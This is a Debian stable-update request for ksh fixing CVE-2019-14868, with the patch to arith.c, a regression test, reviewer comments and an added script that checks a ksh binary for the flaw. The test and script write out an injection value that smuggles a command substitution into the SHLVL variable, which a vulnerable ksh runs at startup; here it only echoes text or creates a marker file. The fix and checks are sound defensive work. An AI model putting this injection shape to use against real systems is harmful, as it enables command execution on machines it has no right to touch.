Package: release.debian.org
Severity: normal
Tags: buster
User: release.debian.org@packages.debian.org
Usertags: pu
X-Debbugs-Cc: anuradha@debian.org, carnil@debian.org

[ Reason ]
Summary of the issue: In ksh version 20120801, a flaw was found in the way
it evaluates certain environment variables. An attacker could use this flaw
to override or bypass environment restrictions to execute shell commands.

[ Impact ]
Services and applications that allow remote unauthenticated attackers to
provide one of those environment variables could allow them to exploit this
issue remotely, although the risk is deemed low.

[ Tests ]
There is a test included in the diff that was used to validate the fix.
Also, the regression test suite was run to make sure there were no
regressions.

[ Risks ]
The regression test suite has been run before and after the patch to
confirm no new regressions. Also, the fix is applied in unstable with no
new issues reported.

[ Checklist ]
  [X] *all* changes are documented in the d/changelog
  [X] I reviewed all changes and I approve them
  [X] attach debdiff against the package in (old)stable
  [X] the issue is verified as fixed in unstable

[ Changes ]
  * Patch to arith.c that fixes the CVE
  * Test case for the fix

[ Other info ]
This was brought up to the security team first, and it was deemed by
Salvatore Bonaccorso that a DSA is not required.

Anuradha

-- System Information:
Debian Release: bullseye/sid
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: amd64 (x86_64)
diff -Nru ksh-93u+20120801/debian/changelog ksh-93u+20120801/debian/changelog
--- ksh-93u+20120801/debian/changelog 2018-12-14 02:26:58.000000000 -0500
+++ ksh-93u+20120801/debian/changelog 2020-07-12 11:26:07.000000000 -0400
@@ -1,3 +1,15 @@
+ksh (93u+20120801-4+deb10u1) buster-security; urgency=high
+
+ * Fix for CVE-2019-14868: in ksh version 20120801, a flaw was found
+ in the way it evaluates certain environment variables. An attacker
+ could use this flaw to override or bypass environment restrictions
+ to execute shell commands. Services and applications that allow
+ remote unauthenticated attackers to provide one of those
+ environment variables could allow them to exploit this issue
+ remotely. (Closes: #948989)
+
+ -- Anuradha Weeraman <anuradha@debian.org> Sun, 12 Jul 2020 11:26:07 -0400
+
ksh (93u+20120801-3.4) unstable; urgency=medium
[ Boyuan Yang ]
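Review bot: the new entry `ksh (93u+20120801-4+deb10u1) buster-security; urgency=high` is addressed to buster-security, but this is a pu request and the [ Other info ] section says the security team decided no DSA is needed, so the distribution should be `buster` (the upload goes through proposed-updates), and urgency=high is not warranted for a stable update outside the security archive. The version is also questionable: the entry it is stacked on is `93u+20120801-3.4`, so unless buster actually ships a -4, the stable-update version should be derived from that one, i.e. `93u+20120801-3.4+deb10u1`, which also keeps it below whatever -4 may later mean in unstable.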
diff -Nru ksh-93u+20120801/debian/patches/cve-2019-14868.patch ksh-93u+20120801/debian/patches/cve-2019-14868.patch
--- ksh-93u+20120801/debian/patches/cve-2019-14868.patch 1969-12-31 19:00:00.000000000 -0500
+++ ksh-93u+20120801/debian/patches/cve-2019-14868.patch 2020-07-12 11:26:07.000000000 -0400
@@ -0,0 +1,97 @@
+Description: CVE-2019-14868
+ Certain environment variables were interpreted as arithmetic
+ expressions on startup, leading to code injection.
+Bug-Debian: https://bugs.debian.org/948989
+Bug-RedHat: https://bugzilla.redhat.com/show_bug.cgi?id=1757324
+Author: Kurtis Rader <krader@skepticism.us>
+Origin: https://github.com/ksh93/ksh/commit/593a5a8b7f272c2488c8a800820ae990942946e7
+Date: 2020-05-21
+
+diff --git a/src/cmd/ksh93/sh/arith.c b/src/cmd/ksh93/sh/arith.c
+index b1059421..6361431b 100644
+--- a/src/cmd/ksh93/sh/arith.c
++++ b/src/cmd/ksh93/sh/arith.c
+@@ -513,21 +513,36 @@ Sfdouble_t sh_strnum(register const char *str, char** ptr, int mode)
+ char base=(shp->inarith?0:10), *last;
+ if(*str==0)
+ {
+- if(ptr)
+- *ptr = (char*)str;
+- return(0);
+- }
+- errno = 0;
+- d = strtonll(str,&last,&base,-1);
+- if(*last || errno)
+- {
+- if(!last || *last!='.' || last[1]!='.')
+- d = strval(shp,str,&last,arith,mode);
+- if(!ptr && *last && mode>0)
+- errormsg(SH_DICT,ERROR_exit(1),e_lexbadchar,*last,str);
++ d = 0.0;
++ last = (char*)str;
++ } else {
++ errno = 0;
++ d = strtonll(str,&last,&base,-1);
++ if (*last && !shp->inarith && sh_isstate(SH_INIT)) {
++ /* This call is to handle "base#value" literals if we're importing untrusted env vars. */
++ errno = 0;
++ d = strtonll(str, &last, NULL, -1);
++ }
++
++ if(*last || errno)
++ {
++ if (sh_isstate(SH_INIT)) {
++ /*
++ * Initializing means importing untrusted env vars. The string does not appear to be
++ * a recognized numeric literal, so give up. We can't safely call strval(), because
++ * that allows arbitrary expressions, causing security vulnerability CVE-2019-14868.
++ */
++ d = 0.0;
++ } else {
++ if(!last || *last!='.' || last[1]!='.')
++ d = strval(shp,str,&last,arith,mode);
++ if(!ptr && *last && mode>0)
++ errormsg(SH_DICT,ERROR_exit(1),e_lexbadchar,*last,str);
++ }
++ } else if (!d && *str=='-') {
++ d = -0.0;
++ }
+ }
+- else if (!d && *str=='-')
+- d = -0.0;
+ if(ptr)
+ *ptr = last;
+ return(d);
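Review bot: in the `if (sh_isstate(SH_INIT))` branch the value is forced to `d = 0.0` but `last` is left pointing at the first unparsed character (the `+` of `2#11+x[...]`, for example), so a caller that passes `ptr` gets a zero result paired with a partial-parse pointer; set `last = (char*)str` there (or advance it to the end of the string) so the pair is consistent. The guard on the re-parse, `if (*last && !shp->inarith && sh_isstate(SH_INIT))`, also differs from the guard on the strval() bypass, which tests only `sh_isstate(SH_INIT)`; either use the same predicate in both places or add a comment saying why `inarith` cannot be set during init. Finally, the silent-zero fallback for anything that is not a recognised literal (so an import such as SHLVL=abc now yields 0 with no diagnostic) is a behaviour change worth a sentence in the patch Description.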
+diff --git a/src/cmd/ksh93/tests/variables.sh b/src/cmd/ksh93/tests/variables.sh
+index 6eec31b6..9ceb2d1b 100755
+--- a/src/cmd/ksh93/tests/variables.sh
++++ b/src/cmd/ksh93/tests/variables.sh
+@@ -674,4 +674,28 @@ level=$($SHELL -c $'$SHELL -c \'print -r "$SHLVL"\'')
+ $SHELL -c 'unset .sh' 2> /dev/null
+ [[ $? == 1 ]] || err_exit 'unset .sh should return 1'
+
++# ======
++# Verify that importing untrusted environment variables does not allow evaluating
++# arbitrary expressions, but does recognize all integer literals recognized by ksh.
++
++expect=8
++actual=$(env SHLVL='7' "$SHELL" -c 'echo $SHLVL')
++[[ $actual == $expect ]] || err_exit "decimal int literal not recognized (expected '$expect', got '$actual')"
++
++expect=14
++actual=$(env SHLVL='013' "$SHELL" -c 'echo $SHLVL')
++[[ $actual == $expect ]] || err_exit "leading zeros int literal not recognized (expected '$expect', got '$actual')"
++
++expect=4
++actual=$(env SHLVL='2#11' "$SHELL" -c 'echo $SHLVL')
++[[ $actual == $expect ]] || err_exit "base#value int literal not recognized (expected '$expect', got '$actual')"
++
++expect=12
++actual=$(env SHLVL='16#B' "$SHELL" -c 'echo $SHLVL')
++[[ $actual == $expect ]] || err_exit "base#value int literal not recognized (expected '$expect', got '$actual')"
++
++expect=1
++actual=$(env SHLVL="2#11+x[\$(env echo Exploited vuln CVE-2019-14868 >&2)0]" "$SHELL" -c 'echo $SHLVL' 2>&1)
++[[ $actual == $expect ]] || err_exit "expression allowed on env var import (expected '$expect', got '$actual')"
++
+ exit $((Errors<125?Errors:125))
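Review bot: the comment under `# ======` should say that a string with a numeric prefix followed by anything else is imported as 0, not as its prefix: the last case expects `1`, which only follows from `2#11+x[...]` being dropped entirely and then incremented, and a reader who assumes the `2#11` prefix is kept would expect 4. Every expected value also relies on the child shell incrementing the imported SHLVL by exactly one, which deserves a comment next to `expect=8`. Minor: quote the right-hand side as `"$expect"` in `[[ $actual == $expect ]]`; unquoted it is a pattern, harmless for these integers but a trap if a non-numeric expected value is ever added.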
diff -Nru ksh-93u+20120801/debian/patches/series ksh-93u+20120801/debian/patches/series
--- ksh-93u+20120801/debian/patches/series 2018-12-14 02:26:58.000000000 -0500
+++ ksh-93u+20120801/debian/patches/series 2020-07-12 11:26:07.000000000 -0400
@@ -7,3 +7,4 @@
ed.patch
0008-Bug-887743-Fix-build-failures-caused-by-update-in-gl.patch
bug915326.patch
+cve-2019-14868.patch
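The regression test in the patch shows the trigger shape for this bug: ksh imports SHLVL from the environment, and a vulnerable build evaluates the imported string as an arithmetic expression, so a command substitution placed inside an array subscript runs during shell startup. The script below is an added example, not code from the Debian bug, the upstream commit or the ksh test suite; it turns that shape into a stand-alone check that a practitioner can point at an installed ksh binary. It assumes only that the binary accepts `-c`, that `env`, `mktemp` and `touch` are available, and it uses a marker file rather than stderr output so that the result does not depend on what the shell prints. The function name and the return-code convention are this example's own.

```shell
#!/bin/sh
# Added check for CVE-2019-14868 (example code, not from the Debian bug or
# the upstream patch). It reuses the trigger shape of the patch's own
# regression test: ksh imports SHLVL from the environment and a vulnerable
# build evaluates it as an arithmetic expression, so a command substitution
# inside an array subscript runs during shell startup. The payload here only
# creates a marker file, so a vulnerable shell is detected without relying on
# its output. Written in POSIX sh (no "local"), so it runs under dash or bash.
#
# cve_2019_14868_check /path/to/ksh
#   returns 0: SHLVL was imported without the expression being evaluated
#           1: the command inside SHLVL ran (vulnerable)
#           2: the shell could not be run
cve_2019_14868_check() {
    c_shell=$1
    if [ ! -x "$c_shell" ]; then
        echo "cve_2019_14868_check: not executable: $c_shell" >&2
        return 2
    fi
    c_dir=$(mktemp -d) || return 2
    c_marker=$c_dir/exploited
    # "2#11" is a base#value literal the fixed shell still accepts; the
    # "+x[...]" suffix makes the whole string an expression whose subscript
    # carries the command substitution (same shape as in variables.sh).
    c_payload="2#11+x[\$(touch '$c_marker')0]"
    # env replaces whatever SHLVL the calling shell exported with the payload.
    c_out=$(env SHLVL="$c_payload" "$c_shell" -c 'echo "$SHLVL"' 2>&1)
    c_status=$?
    if [ -e "$c_marker" ]; then
        rm -rf "$c_dir"
        echo "VULNERABLE: $c_shell executed the command inside SHLVL (SHLVL became '$c_out')"
        return 1
    fi
    rm -rf "$c_dir"
    if [ "$c_status" -ne 0 ]; then
        echo "cve_2019_14868_check: $c_shell exited with status $c_status: $c_out" >&2
        return 2
    fi
    echo "not vulnerable: $c_shell imported SHLVL as '$c_out' without evaluating it"
    return 0
}

# Stand-alone use: check every shell binary named on the command line.
for c_candidate in "$@"; do
    cve_2019_14868_check "$c_candidate"
done
```

Run it as `sh check.sh /bin/ksh93 /usr/bin/ksh` and act on the exit status. A patched ksh reports SHLVL as 1 (the non-numeric import is dropped to 0 and then incremented, exactly as the last case in the patch's test expects), while shells that never treat SHLVL arithmetically, such as dash or bash, simply pass the string through or reset it and also return 0.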